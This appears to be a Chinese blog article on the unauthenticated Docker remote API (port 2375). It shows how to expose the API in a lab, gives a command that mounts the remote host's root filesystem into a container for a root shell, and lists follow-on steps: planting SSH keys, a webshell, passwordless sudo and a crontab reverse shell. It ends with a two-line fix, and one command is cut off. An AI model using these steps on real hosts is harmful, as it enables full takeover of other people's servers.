這篇文章主要講解了“docker remote API漏洞怎么修復(fù)”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“docker remote API漏洞怎么修復(fù)”吧!
創(chuàng)新互聯(lián)公司-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價(jià)比巴州網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式巴州網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋巴州地區(qū)。費(fèi)用合理售后完善,10余年實(shí)體公司更值得信賴。
docker是一種開源的應(yīng)用容器引擎,這個(gè)漏洞是利用docker對(duì)外開放的一個(gè)api接口,因?yàn)闄?quán)限設(shè)置不當(dāng),導(dǎo)致可以遠(yuǎn)程命令執(zhí)行。
· 本地一臺(tái)虛擬機(jī),一臺(tái)臨時(shí)創(chuàng)建的阿里云服務(wù)器
· centos7
· docker-ce-18.09.9
首先探測(cè)2375端口,如果開放,再構(gòu)造http:localhost:2375/version請(qǐng)求,如果返回包帶有json格式,說明存在該漏洞。
配置宿主機(jī)網(wǎng)卡轉(zhuǎn)發(fā)
## 若未配置,需要執(zhí)行如下$ cat <
Yum安裝配置docker
## 下載阿里源repo文件$ curl -o /etc/yum.repos.d/Centos-7.repo http://mirrors.aliyun.com/repo/Centos-7.repo$ curl -o /etc/yum.repos.d/docker-ce.repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo$ yum clean all && yum makecache## 安裝指定版本yum install -y docker-ce-18.09.9## 配置源加速## https://cr.console.aliyun.com/cn-hangzhou/instances/mirrorsmkdir -p /etc/dockervi /etc/docker/daemon.json{ "registry-mirrors" : [ "https://8xpk5wnt.mirror.aliyuncs.com" ]}## 設(shè)置開機(jī)自啟systemctl enable docker systemctl daemon-reload## docker daemonps aux |grep docker## containerdps aux|grep containerdsystemctl status containerd
編輯docker文件:/usr/lib/systemd/system/docker.service
vim /usr/lib/systemd/system/docker.service
修改ExecStart行為下面內(nèi)容
ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock \
重新加載docker配置
systemctl daemon-reload # 加載docker守護(hù)線程systemctl restart docker # 重啟docker
· 查看端口
docker -H tcp://8.135.2.198 run --rm -it -v /:/mnt busybox chroot /mnt sh
· 簡(jiǎn)單解釋一下參數(shù)的含義:
· –rm 容器停止時(shí),自動(dòng)刪除該容器
· -v 掛載目錄。格式為 系統(tǒng)目錄:容器目錄
· -i 指示 docker 要在容器上打開一個(gè)標(biāo)準(zhǔn)的輸入接口
· -t 指示 docker 要?jiǎng)?chuàng)建一個(gè)偽 tty 終端,連接容器的標(biāo)準(zhǔn)輸入接口,之后用戶就可以通過終端進(jìn)行輸入
通過此漏洞,可在docker命令執(zhí)行,并且影響宿主機(jī)。
引用網(wǎng)上的一些總結(jié)流程
1. Docker是以root權(quán)限運(yùn)行的,這是所有姿勢(shì)的前提
1. Docker在運(yùn)行一個(gè)容器的時(shí)候可以將宿主機(jī)上的一個(gè)目錄掛載到容器內(nèi)的一個(gè)目錄,我們可以參考redis未授權(quán)訪問漏洞,將宿主機(jī)的/root/.ssh目錄掛載到容器上,然后寫入公鑰。如果有web目錄的話,最差也能上一個(gè)webshell。
1. 有些服務(wù)器不允許root登錄,可以寫入其他用戶的.ssh/目錄下(通過查看/etc/ssh/sshd_config目錄),然后修改/etc/sudoer中的文件,配置為sudo免密碼,切換為root
1. 還可以通過crontab寫計(jì)劃任務(wù)反彈shell
1.關(guān)閉2375端口 (尤其是公網(wǎng)情況下一定要禁用此端口)
2.在防火墻上配置禁止外網(wǎng)訪問2375端口
感謝各位的閱讀,以上就是“docker remote API漏洞怎么修復(fù)”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)docker remote API漏洞怎么修復(fù)這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是創(chuàng)新互聯(lián),小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!